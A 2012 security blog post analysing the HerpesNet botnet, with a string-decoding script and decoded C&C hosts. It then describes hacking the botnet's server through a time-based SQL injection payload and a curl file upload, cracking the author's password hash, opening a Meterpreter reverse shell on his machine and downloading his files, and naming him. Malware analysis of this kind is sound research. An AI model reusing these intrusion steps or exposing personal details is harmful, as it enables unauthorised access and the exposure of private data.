Analysis & pownage of herpesnet botnet

Published on 2012-05-21 14:00:00.

We received a new sample from our submit mecanism. This sample is a botnet HTTP client called HerpesNet. The md5 of the sample is db6779d497cb5e22697106e26eebfaa8. We started the analysis when we found a way to manage the command & control…

Tools

Static analysis

We start by opening the binary with IDA. We see directly that the file is not packed.

We follow the Win_Main function and at offset 004071E0h we can see a call on 004070E0h (initThread)

image

The initTread function are in charge to decode strings, open a mutex with the name “rffggghooo” and run 3 threads

image

Decode strings

00406FC0h (initVariable) is in charge to decode all obsfucated string

image

00403034h (decode) is in charge to decode strings we do a python script to recover all strings

image

#!/usr/bin/env python
import sys

def decode(src):
    r = ""
    for c in src:
        c = ord(c)
        if  c < 0x61 or c > 0x7a :
            if c < 0x41 or c > 0x5a:
                r += chr(c)
                continue
            x = (( c - 0x41 ) % 0x1a) + 0x41
        else:
            x = ((c - 0x54) % 0x1a) + 0x61

        r += chr(x)
    return r

def main():
    if len(sys.argv) != 2:
            sys.exit(1)

    f = open(sys.argv[1], 'rb')

    f.seek(0x1ae88, 0)
    data = f.read(0x32f) 
    for d in data.split("\0"):
        if len(d) == 0:
            continue
        print "%s : %s" % (d, decode(d))

if __name__ == "__main__":
    main()

y0ug@malware.lu:~/malware/herpes$ python decode-all.py db6779d497cb5e22697106e26eebfaa8
tcerfhygy : gpresultl
3.0 : 3.0
uggc://qq.mrebkpbqr.arg/urecarg/ : http://dd.zeroxcode.net/herpnet/
74978o6rpp6p19836n17n3p2pq0840o0 : 74978b6ecc6c19836a17a3c2cd0840b0
uggc://jjj.mrebkpbqr.arg/urecarg/ : http://www.zeroxcode.net/herpnet/
sgc.mrebkpbqr.arg : ftp.zeroxcode.net
uggc://sex7.zvar.ah/urecarg/ : http://frk7.mine.nu/herpnet/
hcybnq@mrebkpbqr.arg : upload@zeroxcode.net
hccvg : uppit
ujsdsdbbngfgjhhuugfgfujd : hwfqfqooatstwuuhhtstshwq
rffggghooo : esstttubbb
Ashfurncsmx : Afusheapfzk

C&C contact

The function in charge to build the request when it checks the C&C is 004059E0h (buildRerqd)

image

It build the POST data with the information obtained above to make something like that:

userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724

After that it concat the url adding “run.php” add the end of the url passed in parameter

image

00403E57h are in charge to do the http request. By the way it set the useragent with the value 74978b6ecc6c19836a17a3c2cd0840b0 (is the deofuscated value)

image

After it mades the request it call 00405F80h (parseCommand) that manages to execute command received from the C&C (I’m not going to detail command here you can look directly in the idb)

Another interesting function is 0040391Fh (fileUpload) thats upload files by POST methods with the variable name “upfile” can be played directly with curl

y0ug@malware.lu:~/malware/herpes$ curl -F upfile=@test.jpg -A 74978b6ecc6c19836a17a3c2cd0840b0 http://www.zeroxcode.net/herpnet/uploads/uppit.php
File caricato correttamente

Pown the C&C

We are curious about how the C&C are coded so we decide to test some injection SQL on the C&C api especially the “http://www.zeroxcode.net/herpnet/run.php”. With sqlmap we manage to exploit a time-based sqli.

Place: POST
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ
---[08:22:41] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10 back-end DBMS: MySQL 5.0.11

We extract tables names from the database

Database: herpnet
[7 tables]
+----------+
| clients  |
| clinfo   |
| commands |
| htickets |
| husers   |
| paypalt  |
| uploads  |
+----------+

And tada we get the user credential of the malware author

+--------------------------------------------+
|id|username|password                |
|--------------------------------------------|
| 1|    Frk7|6e6bc4e49dd477ebc98ef4046c067b5f|
+--------------------------------------------+

With google we get the password

6e6bc4e49dd477ebc98ef4046c067b5f:ciao

That is a master crime genious password ;)

We found a path disclosure that can be trigger with curl for exemple

y0ug@malware.lu:~/malware/herpes$ curl http://www.zeroxcode.net/herpnet/run.php
<html><head> <title>404 Not Found</title> </head>
<body> <h1>Not Found</h1>
<p>The requested URL C:\inetpub\zeroxcode\herpnet\run.php/ was not found on this server.</p> <hr> 
<address> Server at www.zeroxcode.net Port 80</address> </body></html>

Pown the C&C - part 2

We saw that the developer use a machine called Frk7Test@FRK7TEST-D6E0BD.

So we upload a meterpreter to have a shell on the machine (whith the feature provide by Frk7 himself).

msf  exploit(handler) > exploit

[* ]Started reverse handler on 94.21.200.63:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 151.63.47.177
[*] Meterpreter session 1 opened (94.21.200.63:4444 -> 151.63.47.177:53574) at Mon May 21 16:20:04 +0200 2012
meterpreter > screenshot
Screenshot saved to: /home/y0ug/src/msf3/PtPVDrKD.jpeg

meterpreter > sysinfo 
System Language : it_IT
OS              : Windows XP (Build 2600, Service Pack3).
Computer        : FRK7TEST-D6E0BD                                                                                                    
Architecture    : x86                                                                                                                
Meterpreter     : x86/win32                                                                                                          
meterpreter >

meterpreter > ls                                                                                                                     
                                                                                                                                     
Listing: C:\Documents and Settings\Frk7Test\Desktop\Herpes4Un                                                                       
=============================================================

Mode              Size    Type  Last modified                   Name
----              ----    ----  -------------                   ----
40777/rwxrwxrwx   0       dir   Mon May 21 15:26:37 +0200 2012  .
40777/rwxrwxrwx   0       dir   Mon May 21 15:37:07 +0200 2012  ..
40777/rwxrwxrwx   0       dir   Mon May 21 14:53:32 +0200 2012  Debug
40777/rwxrwxrwx   0       dir   Mon May 21 16:06:41 +0200 2012  Herpes
100666/rw-rw-rw-  890     fil   Mon May 07 20:42:22 +0200 2012  Herpes.sln
100666/rw-rw-rw-  167424  fil   Mon May 21 16:14:06 +0200 2012  Herpes.suo
40777/rwxrwxrwx   0       dir   Mon May 21 16:15:12 +0200 2012  Release
100777/rwxrwxrwx  134     fil   Mon May 07 20:42:12 +0200 2012  clean.bat
100666/rw-rw-rw-  134     fil   Mon May 07 20:42:22 +0200 2012  roba da fare.txt


meterpreter > download -r Herpes ./
[*] downloading: Herpes\antidebug.h -> .//antidebug.h
[*] downloaded : Herpes\antidebug.h -> .//antidebug.h
[*] mirroring  : Herpes\base64 -> .//base64
[*] downloading: Herpes\base64\base64.c -> .//base64/base64.c
[*] downloaded : Herpes\base64\base64.c -> .//base64/base64.c
[*] downloading: Herpes\base64\base64.h -> .//base64/base64.h
[*] downloaded : Herpes\base64\base64.h -> .//base64/base64.h
[*] mirrored   : Herpes\base64 -> .//base64
[*] mirroring  : Herpes\cadt -> .//cadt
[*] downloading: Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib
[*] downloaded : Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib
[*] downloading: Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h
[*] downloaded : Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h
...

The part of file that we are able to download before frk7 shutdown his machine (and web site) here.

And a screenshot of the machine:

image

C&C interface

First the login page:

image

Secondly, the panel page (connected with frk7 account - see on left-top):

image

The tasks page:

image

List of command available:

image

Information about an infected machine (in this case the test machine of frk7 - yes we see you!!)

image

Botnet owner tracing

We made some research to understand who manage this botnet.

First his pseudo: frk7 or siliceous

Secondly his real name: FP

We identified several mail:

Skype account:

It amazing that a botnet manager puts as much information about his private life !!

It’s so crazy that we wonder if this botnet is not a honeypot of the Italian police !!